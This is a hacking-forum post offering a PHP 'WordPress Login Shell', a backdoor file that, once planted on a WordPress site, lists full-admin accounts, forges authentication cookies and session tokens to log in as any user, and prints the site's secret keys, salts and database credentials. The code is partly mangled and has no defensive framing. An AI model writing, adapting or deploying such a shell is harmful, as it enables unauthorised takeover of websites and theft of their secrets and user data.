dEEpEst Posted August 20, 2015 Share Posted August 20, 2015 Credits: jbdabes After releasing my vBulletin Login Shell last year, I decided it was finally time to "expand" and so I wrote the Wordpress Login Shell.It's fully functional, and should find admins on the system with user level 10 (full admin). It also retrieves information like the DB connection info & important keys & nonces from that install of WP (randomly generated by installer).[HIDE-THANKS]ID, true, $secure_cookie); $expiration = time() + apply_filters( 'auth_cookie_expiration', 2 * DAY_IN_SECONDS, $user->ID, true ); $manager = WP_Session_Tokens::get_instance( $user->ID ); $token = $manager->create( $expiration ); wp_generate_auth_cookie( $user->ID, $expiration, 'secure_auth', $token ); do_action('wp_login', $user->user_login, $user); wp_safe_redirect(SELF);}else{ $query = "SELECT * FROM " . $table_prefix . "usermeta WHERE meta_key = 'wp_user_level' AND meta_value = '10'"; $admins = $wpdb->get_results($query); $usernames = array(); $admin_count = count($admins); for($i=0;$iuser_id . "'"; $admin = $wpdb->get_row($query, 'ARRAY_A'); $usernames[] .= '' . $admin['user_login'] . ''; } $usernames = implode(',', $usernames);?>WordPress Login Shell | CP Login Users with admin permissions: Admin directory: Table prefix: Cookie Hash: Auth key: Secure auth key: Logged in key: Nonce key: Auth salt: Secure auth salt: Logged in salt: Nonce salt: Database host: Database user: Database pass: Database name: Written by This is the hidden content, please Sign In or Sign Up . This file allows you to override the default WordPress login system and login to the control panel as anyone. This is the hidden content, please Sign In or Sign Up [/HIDE-THANKS] Link to comment Share on other sites More sharing options...
Recommended Posts